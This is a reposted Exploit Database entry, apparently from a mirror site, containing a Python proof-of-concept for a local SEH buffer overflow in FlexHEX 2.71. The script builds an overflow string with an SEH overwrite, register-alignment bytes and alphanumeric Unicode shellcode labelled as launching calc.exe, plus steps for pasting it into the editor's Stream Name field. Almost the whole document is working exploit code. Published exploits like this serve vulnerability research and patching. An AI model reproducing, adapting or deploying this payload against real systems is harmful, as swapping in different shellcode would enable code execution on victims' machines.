FlexHEX 2.71 – SEH Buffer Overflow (Unicode)

• Exploit Database
• 15 阅读

• 作者： Chris Au
  日期： 2019-04-08
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/46665/

• #!/usr/bin/python -w
  
  #
  # Exploit Author: Chris Au
  # Exploit Title:FlexHEX 2.71 - Local Buffer Overflow (SEH Unicode)
  # Date: 06-04-2019
  # Vulnerable Software: FlexHEX 2.71
  # Vendor Homepage: http://www.flexhex.com
  # Version: 2.71
  # Software Link: http://www.flexhex.com/download/flexhex_setup.exe
  # Tested Windows Windows XP SP3
  #
  #
  # PoC
  # 1. generate evil.txt, copy contents to clipboard
  # 2. open FlexHEX Editor
  # 3. select "Stream", click "New Stream..."
  # 4. paste contents from clipboard in the "Stream Name:"
  # 5. select OK
  # 6. calc.exe
  #
   
  filename="evil.txt"
  junk = "\xcc" * 276
  nseh = "\x90\x45"
  seh = "\xd5\x52" #pop pop retn
  valign = (
  "\x45" #align
  "\x56" #push esi
  "\x45" #align
  "\x58" #pop eax
  "\x45" #align
  "\x05\x20\x11" #add eax,11002000
  "\x45" #align
  "\x2d\x1a\x11" #sub eax,11001a00
  "\x45" #align
  "\x50" #push eax
  "\x45" #align
  "\xc3" #retn
  )
  #nop to shell
  nop = "\x45" * 94
  #call calc.exe, bufferRegister=EAX
  shellcode = (
  "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAI"
  "AQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIA"
  "JQYAZBABABABABkMAGB9u4JBkLK8qrM0ypyps0e9xeP1Y0RD4K"
  "npnPrkPRLLbkb2N42kt2lhlOegmzkvMaYodlMl0aqlKRnLo0Uq"
  "foLMzai7zBl2nrOgTKnrJptKNjoLBkpLjqahISQ8KQ8QpQRkaI"
  "kpKQYCbkMyzxHcnZq9bkNTTK9q9FMaYofLVa8OLMjaI7p8GpRU"
  "9flCamXxmksMo4d5JD1HrknxMTYq8Sc6RkJl0KtKnxKlkQFs4K"
  "zdtKKQJ0RiQ4NDLdOkOkC1pYOjOakOyPQOqOpZ4KN2zKTMaM0j"
  "kQbmu55bKP9pM0b0C8014KROQwkOIEek8pTuTbPVQXcvTU7MeM"
  "iohUOLm6qlyze09k7p0u9ugKa7mCPrbOqZ9pOcYoHURCPa0l0c"
  "Lnc51hOuipAA")
  fill = "\x45" * 5000
  buffer = junk + nseh + seh + valign + nop + shellcode + fill
  textfile = open(filename , 'w')
  textfile.write(buffer)
  textfile.close()